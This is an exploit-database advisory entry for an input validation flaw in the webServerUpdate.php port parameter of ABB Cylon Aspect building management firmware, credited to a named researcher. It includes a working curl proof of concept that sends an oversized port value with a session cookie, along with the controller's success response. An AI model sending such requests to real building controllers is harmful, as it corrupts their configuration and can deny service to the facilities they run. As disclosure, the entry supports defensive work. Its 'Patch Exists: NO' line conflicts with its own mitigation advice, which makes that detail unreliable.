ABB Cylon Aspect 3.08.02 Input Validation Config Poisoning

vendor:

Cylon Aspect

by:

Gjoko 'LiquidWorm' Krstic

6.1

CVSS

HIGH

Input Validation Vulnerability

CWE

Product Name: Cylon Aspect

Affected Version From: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio Firmware: <=3.08.02

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: a:abb_ltd:aspect_firmware:3.08.02

Metasploit:

Other Scripts:

Platforms Tested: GNU/Linux, Intel Processors, PHP, AspectFT Automation Application Server, lighttpd, Apache, OpenJDK, ErgoTech MIX Deployment Server

2024

ABB Cylon Aspect 3.08.02 Input Validation Config Poisoning

The ABB Cylon Aspect 3.08.02 webServerUpdate.php script does not properly validate input on the port POST parameter, allowing attackers to bypass client-side checks and supply arbitrary integer values. This can lead to configuration poisoning, Denial of Service (DoS) attacks, and manipulation of server settings via Cross-Site Request Forgery (CSRF) combined with authentication bypass.

Mitigation:

Update to version 3.08.03 or later to mitigate this vulnerability by ensuring proper input validation on the port POST parameter.

Source

Exploit-DB raw data:

ABB Cylon Aspect 3.08.02 (webServerUpdate.php) Input Validation Config Poisoning
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from improper input validation on
the port POST parameter in the webServerUpdate.php script. This input is not
validated on the server side and relies on bypassable client-side checks using
the inString.js script to verify that the port parameter contains only characters
from the set (0123456789). Attackers can bypass these checks and supply arbitrary
integer values. Exploitation of this issue can result in configuration poisoning,
Denial of Service (DoS) through malformed configurations, or manipulation of
server settings via Cross-Site Request Forgery (CSRF) combined with authentication
bypass.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5901
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5901.php


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/webServerUpdate.php \
> -d "port=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
    <title>The ABB Group</title>
    <link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0" class="workspace" bgcolor="#CCCCCC" width="100%">
    <tr>
        <td width="100%" valign="top">
                        Web Server settings have been successfully updated.<br><br>Please go to <a href='//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/'>//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/</a> to continue.        </td>
    </tr>
</table>
<iframe src="webServerUpdateRun.php" style="visibility:hidden;">
</iframe>
</body>
</html>